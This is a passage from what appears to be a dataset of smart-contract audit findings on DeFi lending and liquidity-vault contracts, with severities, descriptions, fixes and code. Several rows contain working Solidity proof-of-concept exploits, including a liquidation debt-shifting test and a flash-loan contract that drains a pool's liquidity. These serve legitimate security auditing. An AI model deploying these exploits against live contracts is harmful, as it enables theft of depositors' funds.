In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n","We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, ""Pool: borrower not liquidatable"");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint 
userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n","A liquidator can gain not only collateral, but also can reduce his own debt. 
Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.","```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n" +Users can borrow all loan tokens,medium,"Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. 
Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Pool.sol"";\\nimport ""../src/Factory.sol"";\\nimport ""./mocks/Borrower.sol"";\\nimport ""./mocks/ERC20.sol"";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory 
factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), ""G"");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n",A possible solution would be adding a 
locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.,"The vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n 
(uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n" +Fee share calculation is incorrect,medium,"Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.","Use the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. 
Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n","Fee recipient is given more fees than intended, which results in less interest for LPs",```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n +fund loss because calculated Interest would be 0 in getCurrentState() due to division error,medium,"function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. 
Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.",don't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.,borrowers won't pay any interest and lenders would lose funds.,"```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. 
Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n" +"cachedUserRewards variable is never reset, so user can steal all rewards",high,"cachedUserRewards variable is never reset, so user can steal all rewards\\nWhen user wants to withdraw then `_withdrawUpdateRewardState` function is called. This function updates internal reward state and claims rewards for user if he provided `true` as `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen user calls claimRewards, then `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` variable is never reset to 0, once user claimed that amount.\\nBecause of that he can claim multiple times in order to receive all balance of token.","Once user received rewards, reset `cachedUserRewards` variable to 0. 
This can be done inside `_claimInternalRewards` function.",User can steal all rewards,```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n +User can receive more rewards through a mistake in the withdrawal logic,high,"In the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. 
That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 
reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n",First calculate `cachedUserRewards` then reset `userRewardDebts`.,A user can receive more reward tokens than they should by abusing the withdrawal system.,"```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to 
be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n" +Vault can experience long downtime periods,medium,"The chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the balancer pool spot price is within the boundaries defined by `THRESHOLD` respect to the last fetched chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), then the OHM derived oracle price could stay at up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price fro up to 24 h. 
During this period withdrawals and deposits will revert.","Issue Vault can experience long downtime periods\\n`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time.Only a tight range of values around 2% should be allowed to avoid the scenario above.",Withdrawals and deposits can be often unavailable for several hours.,```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n +"SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect",medium,"SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? 
ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, the amount_ is less than LIMIT + 1000 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns 1000 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\n","Issue SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP // Remove the line below\\n= lpAmount_;\\n lpPositions[msg.sender] // Remove the line below\\n= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = _withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] // Remove the line below\\n= pairTokenReceived > userDeposit\\n ? 
